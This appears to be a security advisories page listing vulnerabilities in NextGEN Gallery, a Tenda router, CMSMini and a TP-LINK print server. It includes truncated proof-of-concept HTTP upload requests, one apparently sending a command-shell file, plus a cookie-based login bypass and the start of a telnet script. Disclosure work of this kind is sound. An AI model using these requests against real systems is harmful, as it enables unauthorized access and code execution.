advisories


May. 19, 2014

NextGEN Gallery 1.9.1 - Arbitrary File Upload

Description: The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. Versions prior to NextGEN Gallery 2.0.63 are vulnerable.
Impact: An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Proof of Concept:
POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.

Sep. 30, 2013

Tenda W309R Router 5.07.46 - Information Disclosure

Description: The Tenda Wireless Router W309R does not have proper authentication for the web application console. Though the application asks for a password, its poor cookie management allows a user to log in without providing the password. The application uses the cookie value “admin” to access the private pages, which reveal configuration details such as the PPPoE username, PPPoE password, wireless authentication key, MAC address details, etc., in the page source. The affected firmware version is V5.

Sep. 6, 2013

CMSMini - Multiple Vulnerability

Description: The CMS Mini application is vulnerable to multiple security issues, including arbitrary file upload, Cross Site Request Forgery and Cross Site Scripting.
Impact: To be updated
Proof of Concept:
File Upload URL: http://[target/IP]/cmsmini/admin/index.php?path=&op=newitem
POST /cmsmini/admin/index.php?path=&op=newitem HTTP/1.1
Host: 192.168.15.162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.15.162/cmsmini/admin/index.php?path=
Cookie: PHPSESSID=in6suoa2o1q8ilrtgovjdtcl52
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------219313096530417
Content-Length: 1130
-----------------------------219313096530417
Content-Disposition: form-data; name="imagefile"; filename="cmd.

Jun. 19, 2013

TP-LINK TL-PS110U Print Server Authentication Bypass

Description: The TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability. The device runs a telnet service that enables an attacker to access the configuration details without authentication. The PoC can extract the device name, MAC address, manufacturer name, printer model, and SNMP community strings.
Impact: An attacker can exploit this vulnerability to bypass the access restrictions and obtain sensitive information which can aid in further attacks.
Proof of Concept:
import telnetlib
import sys
host = sys.